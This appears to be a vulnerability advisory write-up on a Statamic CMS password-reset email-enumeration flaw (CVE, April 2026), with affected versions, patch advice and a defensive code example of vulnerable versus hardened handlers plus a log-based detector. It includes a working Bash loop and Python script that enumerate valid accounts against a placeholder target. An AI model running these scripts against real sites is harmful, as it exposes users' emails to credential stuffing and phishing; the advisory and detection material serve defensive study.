The Statamic CMS forgot password endpoint previously responded with different messages or HTTP status codes depending on whether the submitted email address was registered. An unauthenticated attacker could send repeated POST requests to the password reset endpoint, each time providing a different email address. When the email belonged to an existing user, the system would respond with a success message or a different error code compared to a non-existent email. This behavioral discrepancy allowed attackers to build a list of valid user emails by automating the request submissions. The enumeration required only network access to the Statamic CMS instance and could be performed without any prior authentication. Valid user emails could then be used as an entry point for more targeted attacks, such as password brute forcing, credential stuffing, or phishing. The vulnerability existed because the application logic distinguished between “user not found” and “password reset email sent” states. By observing the timing, HTTP status, or text of the response, an attacker could infer account existence. This flaw is a classic user enumeration vulnerability often found in authentication‑related features. The issue affected all Statamic CMS versions lower than 5.73.21 and all versions from 6.0.0 up to but not including 6.15.0. The fix ensures that the endpoint returns identical generic responses for all requests, regardless of email validity. Developers patched the logic to remove any leaked existence information. The CVE was published on GitHub Advisory Database on April 28, 2026. The vulnerability has been given a moderate severity score due to its low complexity and network exploitability, but the lack of direct privilege escalation limits its criticality.
DailyCVE Form:
Platform: Statamic CMS
Version: <5.73.21, >=6.0.0 <6.15.0
Vulnerability: Email enumeration password reset
Severity: Moderate CVSS 5.3
Date: 2026-04-28
Prediction: Patch date 2026-05-06
What Undercode Say:
Bash one-liner to enumerate valid users (reflowed into a syntactically valid loop; assumes one address per line in emails.txt):
while read -r email; do
  # POST each candidate address and look for the "reset link" success text in the body
  curl -s -X POST "https://target.com/!/forgot-password" -d "email=$email" \
    | grep -q "reset link" && echo "Valid: $email"
done < emails.txt
Python script for email enumeration (indentation restored; requires the requests package):
import requests

url = "https://target.com/!/forgot-password"

with open("emails.txt") as f:
    for email in f:
        # Submit one candidate address per request and inspect the response text
        r = requests.post(url, data={"email": email.strip()})
        if "reset" in r.text:
            print(f"[+] Valid email: {email.strip()}")
Exploit:
Unprivileged attacker sends crafted POST requests to the forgot‑password endpoint, analyzes response differences (HTTP status, response body length, or message text), and iterates over a list of candidate email addresses to confirm valid user accounts.
Protection from this CVE:
Update Statamic CMS to 5.73.21 (5.x branch) or 6.15.0 (6.x branch) or later. If an immediate update is impossible, return the same generic message and HTTP status for every forgot-password request, whether or not the address is registered, and consider rate-limiting the endpoint.
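As an added example, not code from Statamic or from this advisory, the two behaviours described above modelled in Python: a handler that leaks account existence through its status code and body, the hardened equivalent that answers every request identically, and a detector that flags source IPs hammering the reset endpoint in constructed access-log lines. The user store, the generic message, the log format and the log lines are assumptions.

```python
# Added example (not Statamic's code): a vulnerable and a hardened
# forgot-password handler modelled as pure functions, plus a detector for
# enumeration bursts in access logs. Users, paths and log lines are constructed.
import re
from collections import defaultdict

USERS = {"alice@example.com", "bob@example.com"}  # constructed user store
GENERIC = "If that address is registered, a reset link has been sent."

def forgot_password_vulnerable(email):
    """Leaks existence: status code and body differ for known vs unknown emails."""
    if email in USERS:
        return 200, "We have emailed your password reset link."
    return 422, "We can't find a user with that email address."

def forgot_password_hardened(email):
    """Same status and body for every input; only the side effect depends on the user."""
    if email in USERS:
        pass  # queue the reset email here; the response below must not depend on it
    return 200, GENERIC

def response_leaks_existence(handler, known, unknown):
    """True when a known and an unknown address produce observably different responses."""
    return handler(known) != handler(unknown)

# Common-log-format line: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+')

def enumeration_candidates(log_lines, path="/!/forgot-password", threshold=5):
    """Source IPs that POSTed to the reset endpoint at least `threshold` times."""
    counts = defaultdict(int)
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m["method"] == "POST" and m["path"] == path:
            counts[m["ip"]] += 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)

SAMPLE_LOG = [  # constructed access-log lines: one source hammering the endpoint
    f'203.0.113.7 - - [28/Apr/2026:10:00:{i:02d} +0000] "POST /!/forgot-password HTTP/1.1" {200 if i % 2 else 422} 512'
    for i in range(6)
] + [
    '198.51.100.2 - - [28/Apr/2026:10:01:00 +0000] "POST /!/forgot-password HTTP/1.1" 200 512',
    '198.51.100.9 - - [28/Apr/2026:10:01:05 +0000] "GET /!/forgot-password HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for h in (forgot_password_vulnerable, forgot_password_hardened):
        print(h.__name__, "leaks:", response_leaks_existence(h, "alice@example.com", "nobody@example.com"))
    print("enumeration candidates:", enumeration_candidates(SAMPLE_LOG))
```

The hardened handler also needs to do the same amount of work on both paths so that timing does not become the new oracle; the constant response shown here removes only the status and body differences.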
Impact:
Low‑complexity user enumeration leads to exposure of valid email addresses, facilitating subsequent credential‑based attacks such as password brute‑forcing, credential stuffing, and targeted phishing campaigns against known users.
Sources:
Reported By: github.com